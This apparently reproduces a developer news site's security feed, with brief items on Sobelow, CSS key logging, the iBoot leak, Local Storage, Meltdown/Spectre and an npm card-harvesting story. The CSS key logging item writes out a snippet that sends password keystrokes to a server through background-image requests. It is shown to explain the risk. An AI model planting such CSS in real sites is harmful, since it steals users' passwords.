Security Icon


InfoSec, DevSec, Penetration Testing, etc.
23 Stories
All Topics

Griffin Byatt

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he'd found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he'd be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that's what he did and that's what I'm doing! 💚

logged by @jerodsanto 2018-03-20T14:48:00.012895Z permalink #phoenix #security

Security Icon

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Jake shared many examples as well as ways to mitigate these types of attacks.

logged by @adamstac 2018-02-27T22:25:54.376661Z permalink #security #css

Security Icon

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here's how it works: Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } When the user types an a in to the password field, it will hit your server for logging. Dastardly!

logged by @jerodsanto 2018-02-23T14:09:00.007925Z permalink #security #css

iOS Icon

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called "the biggest leak in history", which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it's likely the biggest leak in Apple software history. Motherboard says it... could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That's plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn't get updated as often as the Music app, so it's likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all to well that once source code is made public, there's no taking it private again.

logged by @jerodsanto 2018-02-08T14:39:54.81557Z permalink #ios #security

Security Icon

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tldr, don't use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.

logged by @adamstac 2018-01-28T05:56:15.515292Z permalink #security #database

Medium Icon Medium

Meltdown and Spectre Explained

If some or most of what you've heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to breakdown the exploit.

logged by @adamstac 2018-01-18T22:28:24.667005Z permalink #security

Security Icon

Meltdown and Spectre

Everything you need to know about the Meltdown and Spectre bug. Q: Am I affected by the bug? A: Most certainly, yes. Q: Can I detect if someone has exploited Meltdown or Spectre against me? A: Probably not. The exploitation does not leave any traces in traditional log files. Q: Which systems are affected by Meltdown? A: Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995. Uh oh. 😱

logged by @adamstac 2018-01-07T04:59:44.381717Z permalink #security

Hackernoon Icon Hackernoon

I'm harvesting credit card numbers and passwords from your site. Here's how.

This is pretty scary regardless if it's based on a true story or not. When I first wrote this code back in 2015, it was of no use at all sitting on my computer. I needed to get it out into the world. Out into your site. Lucky for me, we live in an age where people install npm packages like they’re popping pain killers. So, npm was to be my distribution method. I would need to come up with some borderline-useful package that people would install without thinking — my Trojan horse. Oh and then there was this — this is an excellent opportunity for taking over npm packages and injecting malware by malicious people.

logged by @adamstac 2018-01-07T04:54:29.129835Z permalink #security

Rails Icon


A project after my own heart: 🗝 Add authentication to your Rails app without all the icky-ness of passwords We've been password-free on for awhile now. It's not without drawbacks, but you can definitely sleep better knowing that even a database breach can't compromise your users' passwords. Because there aren't any.

logged by @jerodsanto 2017-12-12T17:59:00.010714Z permalink #rails #security
0:00 / 0:00